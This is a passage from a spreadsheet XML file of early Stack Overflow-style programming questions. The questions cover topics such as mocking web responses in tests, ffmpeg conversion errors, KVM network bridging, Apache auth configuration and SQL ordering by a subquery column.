    <t xml:space="preserve">&lt;p&gt;I have finally started messing around with creating some apps that work with RESTful web interfaces, however, I am concerned that I am hammering their servers every time I hit F5 to run a series of tests..&lt;/p&gt;
&lt;p&gt;Basically, I need to get a series of web responses so I can test I am parsing the varying responses correctly, rather than hit their servers every time, I thought I could do this once, save the XML and then work locally.&lt;/p&gt;
&lt;p&gt;However, I don't see how I can "mock" a WebResponse, since (AFAIK) they can only be instantiated by &lt;strong&gt;WebRequest.GetResponse&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;How do you guys go about mocking this sort of thing? Do you? I just really don't like the fact I am hammering their servers :S I dont want to change the code &lt;em&gt;too&lt;/em&gt; much, but I expect there is a elegant way of doing this..&lt;/p&gt;
&lt;h2&gt;Update Following Accept&lt;/h2&gt;
&lt;p&gt;Will's answer was the slap in the face I needed, I knew I was missing a fundamental point!&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Create an Interface that will return a proxy object which represents the XML.&lt;/li&gt;
&lt;li&gt;Implement the interface twice, one that uses WebRequest, the other that returns static "responses".&lt;/li&gt;
&lt;li&gt;The interface implmentation then either instantiates the return type based on the response, or the static XML.&lt;/li&gt;
&lt;li&gt;You can then pass the required class when testing or at production to the service layer.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Once I have the code knocked up, I'll paste some samples.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I choose a CMS/Portal solution for a small website(s)?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I currently maintain 3 websites all revolving around the same concept. 2 of them are WinForms applications where the website gives a few basic details, and download links. The third is a web application to query data. I also have a forum (SMF/TinyPortal) that has been serving as a tech support/news hub for the three sites. The download traffic is decent, but I don't get a lot of hits on the support forums&lt;/p&gt;
&lt;p&gt;I want to consolidate these three entities so that I don't have to duplicate announcements, upload data library updates to multiple locations, and also provide a unified look to the sites.&lt;/p&gt;
&lt;p&gt;Fortunately my hosting account has both .NET and PHP support, so I've been looking into Drupal, Graffiti, DotNetNuke, Joomla, Community Server, and more. However, it has been hard for me to discern between what features included, supported, or just not part of the framework whatsoever.&lt;/p&gt;
&lt;p&gt;Does anybody have a good evaluation of these projects (and others too) and can evaluate them for features/expandability/customization/etc.? I'm not necessarily looking for a "what's your favorite" but more of a feature set / target end user type evaluation.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How does gcc implement stack unrolling for C++ exceptions on linux?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;How does gcc implement stack unrolling for C++ exceptions on linux?  In particular, how does it know which destructors to call when unrolling a frame (i.e., what kind of information is stored and where is it stored)?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to edit sessions parameters on Oracle 10g XE?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;default is 49&lt;/p&gt;
&lt;p&gt;how to edit to higher?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to embed audio/video on HTML page that plays on iPhone browser over GPRS</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Although I don't have an iPhone to test this out, my colleague told me that embedded
media files such as the one in the snippet below, only works when the iphone is connected over the
WLAN connection or 3G, and does not work when connecting via GPRS.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;html&amp;gt;&amp;lt;body&amp;gt;
&amp;lt;object data="http://joliclic.free.fr/html/object-tag/en/data/test.mp3" type="audio/mpeg"&amp;gt;
   &amp;lt;p&amp;gt;alternate text&amp;lt;/p&amp;gt;
&amp;lt;/object&amp;gt;
&amp;lt;/body&amp;gt;&amp;lt;/html&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Is there an example URL with a media file, that will play in an iPhone browser 
when the iphone connects using GPRS (not 3G)?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Numbering Regex Submatches</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is there a canonical ordering of submatch expressions in a regular
expression? &lt;/p&gt;
&lt;p&gt;For example: What is the order of the submatches in&lt;br /&gt;
"(([0-9]{3}).([0-9]{3}).([0-9]{3}).([0-9]{3}))\s+([A-Z]+)" ?&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;a. (([0-9]{3})\.([0-9]{3})\.([0-9]{3})\.([0-9]{3}))\s+([A-Z]+)  
   (([0-9]{3})\.([0-9]{3})\.([0-9]{3})\.([0-9]{3}))  
   ([A-Z]+)  
   ([0-9]{3})  
   ([0-9]{3})  
   ([0-9]{3})  
   ([0-9]{3})  
b. (([0-9]{3})\.([0-9]{3})\.([0-9]{3})\.([0-9]{3}))\s+([A-Z]+)  
   (([0-9]{3})\.([0-9]{3})\.([0-9]{3})\.([0-9]{3}))  
   ([0-9]{3})  
   ([0-9]{3})  
   ([0-9]{3})  
   ([0-9]{3})  
   ([A-Z]+)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;or&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;c. somthin' else.
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>What are good grep tools for Windows?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Any recommendations on &lt;a href="http://en.wikipedia.org/wiki/Grep"&gt;grep&lt;/a&gt; tools for Windows? Ideally ones that could leverage 64-bit OS.&lt;/p&gt;
&lt;p&gt;I'm aware of &lt;a href="http://www.cygwin.com/"&gt;Cygwin&lt;/a&gt;, of course, and have also found &lt;a href="http://www.powergrep.com/"&gt;PowerGREP&lt;/a&gt;, but I'm wondering if there are any hidden gems out there?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How can I find the location of a regex match in Perl?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I need to write a function that receives a string and a regex. I need to check if there is a match and return the start and end location of a match. (The regex was already compiled by &lt;code&gt;qr//&lt;/code&gt;.)&lt;/p&gt;
&lt;p&gt;The function might also receive a "global" flag and then I need to return the (start,end) pairs of all the matches.&lt;/p&gt;
&lt;p&gt;I cannot change the regex, not even add &lt;code&gt;()&lt;/code&gt; around it as the user might use &lt;code&gt;()&lt;/code&gt; and &lt;code&gt;\1&lt;/code&gt;. Maybe I can use &lt;code&gt;(?:)&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;Example: given "ababab" and the regex &lt;code&gt;qr/ab/&lt;/code&gt;, in the global case I need to get back 3 pairs of (start, end).&lt;/p&gt;
</t>
  </si>
  <si>
    <t>textboxes in Datarepeater dynamicly 'databound'</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I need to know if it is possible to dynamically bind a textbox residing within a datarepeater to a 'dynamically' created BindingSource.  I am using VB.net.  The database I am using is a MySQL database.  &lt;/p&gt;
&lt;p&gt;I have to use the connection dynamicly due to the fact that the database my not permanently reside on the same server.&lt;/p&gt;
&lt;p&gt;[edit]&lt;br&gt;
ok, so it seams that i am a dolt when asking questions.  The app that i am making is not web based.  it is a simple (i hope) app that connects to a MySQL database, accesses a table so i can edit/view it.  Current setup is using the Add DataSource wizard.  I have successfully connected to the dbase dynamicly using the mysql connector dll but without the textboxes set at design time to a datasource, i am unsure on how to 'link' them via the datarepeater.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Automated integration testing a C++ app with a database</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am introducing automated integration testing to a mature application that until now has only been manually tested.&lt;/p&gt;
&lt;p&gt;The app is Windows based and talks to a MySQL database.&lt;/p&gt;
&lt;p&gt;What is the best way (including details of any tools recommended) to keep tests independent of each other in terms of the database transactions that will occur? &lt;/p&gt;
&lt;p&gt;(Modifications to the app source for this particular purpose are not an option.)&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Why do some conversions from wmv to flv with ffmpeg fail?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Ive been smashing my head with this for a while. I have 2 completely identical .wmv files encoded with wmv3 codec. I put them both through ffmpeg with the following command:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;/usr/bin/ffmpeg -i file.wmv -ar 44100 -ab 64k -qscale 9 -s 512x384 -f flv file.flv
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;One file converts just fine, and gives me the following output:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt; FFmpeg version SVN-r11070, Copyright (c) 2000-2007 Fabrice Bellard, et al.
  configuration: --prefix=/usr --incdir=/usr/include/ffmpeg --libdir=/usr/lib64 --shlibdir=/usr/lib64 --mandir=/usr/share/man --arch=x86_64 --extra-cflags=-O2 -g -pipe -Wall -Wp,-D_FORTIFY_SOURCE=2 -fexceptions -fstack-protector --param=ssp-buffer-size=4 -m64 -mtune=generic --enable-liba52 --enable-libfaac --enable-libfaad --enable-libgsm --enable-libmp3lame --enable-libtheora --enable-libvorbis --enable-libxvid --enable-libx264 --enable-pp --enable-pthreads --disable-static --enable-shared --enable-gpl --disable-debug --disable-optimizations --disable-strip
  libavutil version: 49.5.0
  libavcodec version: 51.48.0
  libavformat version: 51.19.0
  built on Jun 25 2008 09:17:38, gcc: 4.1.2 20070925 (Red Hat 4.1.2-33)
Seems stream 1 codec frame rate differs from container frame rate: 1000.00 (1000/1) -&amp;gt; 29.97 (30000/1001)
Input #0, asf, from 'ok.wmv':
  Duration: 00:14:22.3, start: 3.000000, bitrate: 467 kb/s
    Stream #0.0: Audio: wmav2, 44100 Hz, stereo, 64 kb/s
    Stream #0.1: Video: wmv3, yuv420p, 320x240 [PAR 0:1 DAR 0:1], 400 kb/s, 29.97 tb(r)
Output #0, flv, to 'ok.flv':
    Stream #0.0: Video: flv, yuv420p, 512x384 [PAR 0:1 DAR 0:1], q=2-31, 200 kb/s, 29.97 tb(c)
    Stream #0.1: Audio: libmp3lame, 44100 Hz, stereo, 64 kb/s
Stream mapping:
  Stream #0.1 -&amp;gt; #0.0
  Stream #0.0 -&amp;gt; #0.1
Press [q] to stop encoding
frame=25846 fps=132 q=9.0 Lsize=   88486kB time=862.4 bitrate= 840.5kbits/s
video:80827kB audio:6738kB global headers:0kB muxing overhead 1.050642%
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;While another file, fails:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;FFmpeg version SVN-r11070, Copyright (c) 2000-2007 Fabrice Bellard, et al.
  configuration: --prefix=/usr --incdir=/usr/include/ffmpeg --libdir=/usr/lib64 --shlibdir=/usr/lib64 --mandir=/usr/share/man --arch=x86_64 --extra-cflags=-O2 -g -pipe -Wall -Wp,-D_FORTIFY_SOURCE=2 -fexceptions -fstack-protector --param=ssp-buffer-size=4 -m64 -mtune=generic --enable-liba52 --enable-libfaac --enable-libfaad --enable-libgsm --enable-libmp3lame --enable-libtheora --enable-libvorbis --enable-libxvid --enable-libx264 --enable-pp --enable-pthreads --disable-static --enable-shared --enable-gpl --disable-debug --disable-optimizations --disable-strip
  libavutil version: 49.5.0
  libavcodec version: 51.48.0
  libavformat version: 51.19.0
  built on Jun 25 2008 09:17:38, gcc: 4.1.2 20070925 (Red Hat 4.1.2-33)
[wmv3 @ 0x3700940d20]Extra data: 8 bits left, value: 0
Seems stream 1 codec frame rate differs from container frame rate: 1000.00 (1000/1) -&amp;gt; 25.00 (25/1)
Input #0, asf, from 'bad3.wmv':
  Duration: 00:06:34.9, start: 4.000000, bitrate: 1666 kb/s
    Stream #0.0: Audio: 0x0162, 48000 Hz, stereo, 256 kb/s
    Stream #0.1: Video: wmv3, yuv420p, 512x384 [PAR 0:1 DAR 0:1], 1395 kb/s, 25.00 tb(r)
File 'ok.flv' already exists. Overwrite ? [y/N] y
Output #0, flv, to 'ok.flv':
    Stream #0.0: Video: flv, yuv420p, 512x384 [PAR 0:1 DAR 0:1], q=2-31, 200 kb/s, 25.00 tb(c)
    Stream #0.1: Audio: libmp3lame, 48000 Hz, stereo, 64 kb/s
Stream mapping:
  Stream #0.1 -&amp;gt; #0.0
  Stream #0.0 -&amp;gt; #0.1
Unsupported codec (id=0) for input stream #0.0
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The only difference I see is with the Input audio codec&lt;/p&gt;
&lt;p&gt;Working:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Stream #0.0: Audio: wmav2, 44100 Hz, stereo, 64 kb/s
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Not working:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt; Stream #0.0: Audio: 0x0162, 48000 Hz, stereo, 64 kb/s
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Any ideas?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Using DateAdd in umbraco xslt to display next year's date</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm trying to display the date for a year from now in an xslt file using umbraco like so:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;xsl:variable name="now" select="umbraco.library:CurrentDate()"/&amp;gt;
&amp;lt;xsl:value-of select="umbraco.library:DateAdd($now, 'year', 1)"/&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The value-of tag outputs today's date.  How can I get the DateAdd to add a year to the current date?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do you overcome the svn 'out of date' error?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've been attempting move a directory structure from one location to another in Subversion, but I get an &lt;code&gt;Item '*' is out of date&lt;/code&gt; commit error.  &lt;/p&gt;
&lt;p&gt;I have the latest version checked out (so far as I can tell). &lt;code&gt;svn st -u&lt;/code&gt; turns up no differences other than the mv commands.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C#: Is Implicit Arraylist assignment possible?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'd like to populate an arraylist by specifying a list of values just like I would an integer array, but am unsure of how to do so without repeated calls to the "add" method.&lt;/p&gt;
&lt;p&gt;For example, I want to assign { 1, 2, 3, "string1", "string2" } to an arraylist.  I know for  other arrays you can make the assignment like:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;int[] IntArray = {1,2,3};
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Is there a similar way to do this for an arraylist?  I tried the addrange method but the curly brace method doesn't implement the ICollection interface.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C#: Import/Export Settings into/from a File</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;What's the best way to import/export app internal settings into a file from within an app?&lt;/p&gt;
&lt;p&gt;I have the Settings.settings file, winform UI tied to the settings file, and I want to import/export settings, similar to Visual Studio Import/Export Settings feature. &lt;/p&gt;
</t>
  </si>
  <si>
    <t>Any other tools/plugins like VisualAssist that will change my life (MSVS)?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I was introduced to VisualAssist a few years ago and for me there's no going back.  Are there any other tools I'm missing out on?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>KVM/QEMU network TAP problems with libvirt</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm trying to use libvirt with virsh to manage my kvm/qemu vms. The problem I have is with getting it to work with  public IPs. The server is running ubuntu 8.04.&lt;/p&gt;
&lt;p&gt;libvirt keeps trying to run it as:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;/usr/bin/kvm -M pc -m 256 -smp 3 -monitor pty -no-acpi \ 
  -drive file=/opt/virtual-machines/calculon/root.qcow2,if=ide,boot=on \ 
  -net nic,vlan=0,model=virtio -net tap,fd=10,vlan=0 -usb -vnc 127.0.0.1:0
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Which boots, but does not have any network access (pings go nowhere). Running it without fd=10 makes it work right, with kvm creating the necessary TAP device for me and networking functioning inside the host. All the setup guides I've seen focus on setting up masquerading, while I just want a simple bridge and unfiltered access to the net (both the guests and host must use public IPs). &lt;/p&gt;
&lt;p&gt;Running ifconfig on the host gives this, the bridge is manually setup in my /etc/network/interfaces file. :&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;br0   Link encap:Ethernet  HWaddr 00:1e:c9:3c:59:b8
      inet addr:12.34.56.78  Bcast:12.34.56.79  Mask:255.255.255.240
      inet6 addr: fe80::21e:c9ff:fe3c:59b8/64 Scope:Link
      UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
      RX packets:3359 errors:0 dropped:0 overruns:0 frame:0
      TX packets:3025 errors:0 dropped:0 overruns:0 carrier:0
      collisions:0 txqueuelen:0
      RX bytes:180646 (176.4 KB)  TX bytes:230908 (225.4 KB)
eth0  Link encap:Ethernet  HWaddr 00:1e:c9:3c:59:b8
      inet6 addr: fe80::21e:c9ff:fe3c:59b8/64 Scope:Link
      UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
      RX packets:6088386 errors:0 dropped:0 overruns:0 frame:0
      TX packets:3058 errors:0 dropped:0 overruns:0 carrier:0
      collisions:0 txqueuelen:1000
      RX bytes:680236624 (648.7 MB)  TX bytes:261696 (255.5 KB)
      Interrupt:33
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Any help would be greatly appreciated.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Throwing exceptions in ASP.NET C#</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is there a difference between just saying &lt;code&gt;throw;&lt;/code&gt; and &lt;code&gt;throw ex;&lt;/code&gt; assuming &lt;code&gt;ex&lt;/code&gt; is the exception you're catching?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Can regex capture and substitution be used with an Apache DirectoryMatch directive?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Does anyone know if it's possible to use regex capture within Apache's DirectoryMatch directive? I'd like to do something like the following:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;DirectoryMatch ^/home/www/(.*)&amp;gt;
    AuthType Basic
    AuthName $1
    AuthUserFile /etc/apache2/svn.passwd
    Require group $1 admin
&amp;lt;/DirectoryMatch&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;but so far I've had no success.&lt;/p&gt;
&lt;p&gt;Specifically, I'm trying to create a group-based HTTP Auth for individual directories/vhosts on a server in Apache 2.0. &lt;/p&gt;
&lt;p&gt;For example, Site A, pointing to /home/www/a will be available to all users in group admin and group a, site b at /home/www/b will be available to all users in group admin and group b, etc. I'd like to keep everything based on the directory name so I can easily script adding htpasswd users to the correct groups and automate this as much as possible, but other suggestions for solving the problem are certainly welcome.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Reporting Services Deployment</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I need to create a repeatable process for deploying SQL Server Reporting Services reports.  I am not in favor of using Visual Studio and or Business Development Studio to do this.  The rs.exe method of scripting deployments also seems rather clunky.  Does anyone have a very elegant way that they have been able to deploy reports. The key here is that I want the process to be completely automated.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I restore from a drop database command using a mysql binary log?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;How can I restore a mysql database that was dropped using a "drop database" command? I have access to binary logs which should make this type of rollback possible.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Polynomial time algorithm for finding a Hamiltonian walk in a graph</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is there a polynomial time algorithm for finding a Hamiltonian walk in a graph?&lt;/p&gt;
&lt;p&gt;My algorithm is N factorial and is really slow.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is there any reason to not ship the pdb's with your application?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Since you can use reflector to reverse-engineer a .Net app, is there any reason to NOT ship the pdb files with the app? If you do ship them with it, then your stack trace will include the line number with the problem, which is useful if it crashes.&lt;/p&gt;
&lt;p&gt;Please only enter 1 reason per comment for voting.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Two Phase Commit/Shared Transaction</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;The scenario is this&lt;/p&gt;
&lt;p&gt;We have two applications A and B, both which are running in separate database (Oracle 9i ) transactions&lt;/p&gt;
&lt;p&gt;Application A - inserts some data into the database, then calls Application B
Application B - inserts some data into the database, related (via foreign keys) to A's data. Returns an "ID" to Application A
Application A - uses ID to insert further data, including the ID from B&lt;/p&gt;
&lt;p&gt;Now, because these are separate transactions, but both rely on data from each others transactions, we need to commit between the calls to each application. This of course makes it very difficult to rollback if anything goes wrong. &lt;/p&gt;
&lt;p&gt;How would you approach this problem, with minimal refactoring of the code. Surely this kind of this is a common problem in the SOA world?&lt;/p&gt;
&lt;p&gt;------ Update --------&lt;/p&gt;
&lt;p&gt;I have not been able to find anything in Oracle 9i, however Oracle 11g provides &lt;a href="http://www.morganslibrary.org/reference/dbms%5Fxa.html" rel="nofollow"&gt;DBMS_XA&lt;/a&gt;, which does exactly what I was after.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is it possible to store and retrieve a boolean value in a varchar field using Java JDBC?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;quick question: my customer has a situation where he has his database with a varchar field and the corresponding jdbc code is storing/retrieving a boolean.&lt;/p&gt;
&lt;p&gt;I guess that the boolean values false and true are going to be translated to "0" and "1" but I would like to have a confirmation of this (I can't find the precise behavior specification online, maybe it depends on each driver, Oracle in this case).&lt;/p&gt;
&lt;p&gt;I know I could experiment by myself, but I want to have a try at stackoverflow.com!&lt;/p&gt;
&lt;p&gt;Thanks for your answer,&lt;/p&gt;
&lt;p&gt;Eric.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How can I ban a whole company from my web site?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;For reasons I won't go into, I wish to ban an entire company from accessing my web site. Checking the remote hostname in php using gethostbyaddr() works, but this slows down the page load too much. Large organizations (eg. hp.com or microsoft.com) often have blocks of IP addresses. Is there anyway I get the full list, or am I stuck with the slow reverse-DNS lookup? If so, can I speed it up?&lt;/p&gt;
&lt;p&gt;Edit: Okay, now I know I can use the .htaccess file to ban a range. Now, how can I figure out what that range should be for a given organization?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Annuity or Angle Operation Symbol in LaTeX</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;How do I set the symbol for the &lt;em&gt;angle&lt;/em&gt; or &lt;em&gt;annuity&lt;/em&gt; operation in LaTeX? Specifically, this is the actuarial &lt;em&gt;a&lt;/em&gt; angle &lt;em&gt;s&lt;/em&gt; = (1-v&lt;sup&gt;s&lt;/sup&gt;)/i.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>css help with box models</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I need help with the css box models. I have a problem with my website ucare-ph.org  . The logo (temporary) is covering the main copy.  Now I know someone can tell me the code to fix this. But what I really need is a resource or resources in books or websites that can give me a better understanding of the box model. The syntax is very easy. But the relationship between the boxes is very difficult. And yes I have firebug and web dev for firefox. But its still trial and error. &lt;/p&gt;
</t>
  </si>
  <si>
    <t>App_Code folder issues</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;So I'm having a really weird issue with my App_Code folder on a new website I'm designing.  &lt;/p&gt;
&lt;p&gt;I have a basic class inside of a namespace in the App_Code folder.  Everything works fine in the IDE when I setup the namespace and make an object from the class.  It brings up the class summary on hover, and when you click on "go to deffinition" it goes to the class file.
And it also works fine localy.&lt;/p&gt;
&lt;p&gt;However, when I load the site onto my server, I get this error message when I access that page:  &lt;/p&gt;
&lt;p&gt;Line 10: using System.Web.UI.WebControls;&lt;br/&gt;
Line 11: using System.Web.UI.WebControls.WebParts;&lt;br/&gt;
&lt;strong&gt;Line 12: using xxxx.xxxx&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Compiler Error Message:&lt;/strong&gt; CS0246: The type or namespace name 'xxxxxx' could not be found (are you missing a using directive or an assembly reference?)&lt;/p&gt;
&lt;p&gt;I know for a fact that the class file is there.  Anyone have any idea of whats going on?&lt;/p&gt;
&lt;p&gt;Edits:&lt;/p&gt;
&lt;p&gt;John, yes it is a 2.0 site.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Do anyone do test cases for pojos?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is that needed?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do you pass arguments to define_method?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I would like to pass an argument(s) to a method being defined using define_method, how would I do that?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Can I display the list of all the system objects (semaphores, queues...) in VxWorks?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I would like to know what semaphores, messageQueues, etc... are active in my vxWorks 6.x system. I have access to this information via the debugger, but I would like access to it from the shell.&lt;/p&gt;
&lt;p&gt;Is there a way?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to reference a custom field in SQL</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am using mssql and am having trouble using a subquery. The real query is quite complicated, but it has the same structure as this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;select 
  customerName, 
  customerId,
  (
    select count(*) 
    from Purchases 
    where Purchases.customerId=customerData.customerId
  ) as numberTransactions
from customerData
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;And what I want to do is order the table by the number of transactions, but when I use&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;order by numberTransactions
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;It tells me there is no such field. Is it possible to do this? Should I be using some sort of special keyword, such as &lt;code&gt;this&lt;/code&gt;, or &lt;code&gt;self&lt;/code&gt;?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What time should I build to production?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;My users use the site pretty equally 24/7. Is there a meme for build timing?&lt;/p&gt;
&lt;p&gt;International audience, single cluster of servers on eastern time, but gets hit well into the morning, by international clients.&lt;/p&gt;
&lt;p&gt;1 db, several web servers, so if no db, simple, whenever.&lt;/p&gt;
&lt;p&gt;But when the site has to come down, when would you, as a programmer be least mad to see SO be down for say 15 minutes.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Entity Framework - Can you map the result type of an imported stored procedure to a custom entity type?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I already have an entity model in a separate dll that contains various objects that I need to use. I don't really want to create or duplicate entities using the EF designer. Instead I would like to configure it so that when I call a stored procedure it will map certain columns to specific properties.&lt;/p&gt;
&lt;p&gt;I know you can do something VERY close to this using a custom DataContext in LinqToSql. The problem is you can't assign columns to complex property types. For example: I might have a columns returned that contain the address for a user. I would like to store the address details for the user in an Address object that is a property of a User object. So, Column STREET should map to User.Address.Street.&lt;/p&gt;
&lt;p&gt;Any ideas?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>In Classic asp, can I store a database connection in the Session object?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Can I store a database connection in the Session object?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Integrating with Google Docs</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Has anyone integrated an "Open in Google Docs" in their web app yet? Gmail has this for opening attachments. How about any other sightings of this in a &lt;em&gt;non-google&lt;/em&gt; web app?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What's the easiest way to merge (server-side) a collection of PDF documents into one big PDF document in JAVA</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have 3 PDF documents that are generated on the fly by a legacy library that we use, and written to disk. What's the easiest way for my JAVA server code to grab these 3 documents and turn them into one long PDF document where it's just all the pages from document #1, followed by all the pages from document #2, etc.&lt;/p&gt;
&lt;p&gt;Ideally I would like this to happen in memory so I can return it as a stream to the client, but writing it to disk is also an option.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>SQL Server sys.databases log_reuse_wait question</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I was investigating the rapid growth of a SQL Server 2005 transaction log when I found that transaction logs will only truncate correctly - if the sys.databases "log_reuse_wait" column is set to 0 - meaning that nothing is keeping the transaction log from reusing existing space.    &lt;/p&gt;
&lt;p&gt;One day when I was intending to backup/truncate a log file, I found that this column had a 4, or ACTIVE_TRANSACTION going on in the tempdb. I then checked for any open transactions using DBCC OPENTRAN('tempdb'), and the open_tran column from sysprocesses. The result was that I could find no active transactions anywhere in the system.&lt;/p&gt;
&lt;p&gt;Are the settings in the log_reuse_wait column accurate? Are there transactions going on that are not detectable using the methods I described above? Am I just missing something obvious?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What is your session management strategy for NHibernate in desktop applications?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I find it much more difficult to manage your session in a desktop application, because you cannot take advantage of such a clear bondary like HttpContext.
So how do you manage your session lifetime to take advantage of lazy loading but without having one session open for the entire application?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Good asp.net (C#) apps?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Any suggestions for good open source asp.net (C#) apps out there which meet as many of the following:?&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;Designed well and multi tiered&lt;/li&gt;
&lt;li&gt;Clean &amp;amp; commented code&lt;/li&gt;
&lt;li&gt;Good use of several design patterns&lt;/li&gt;
&lt;li&gt;Web pages display properly in all common browsers&lt;/li&gt;
&lt;li&gt;Produces valid html and has good use of css&lt;/li&gt;
&lt;li&gt;Use of css themes. Prefer usage of css than tables&lt;/li&gt;
&lt;li&gt;NOT dependent on third party components (grids, menus, trees, ...etc)&lt;/li&gt;
&lt;li&gt;Has good unit tests&lt;/li&gt;
&lt;li&gt;Web pages are not simplistic and look professional&lt;/li&gt;
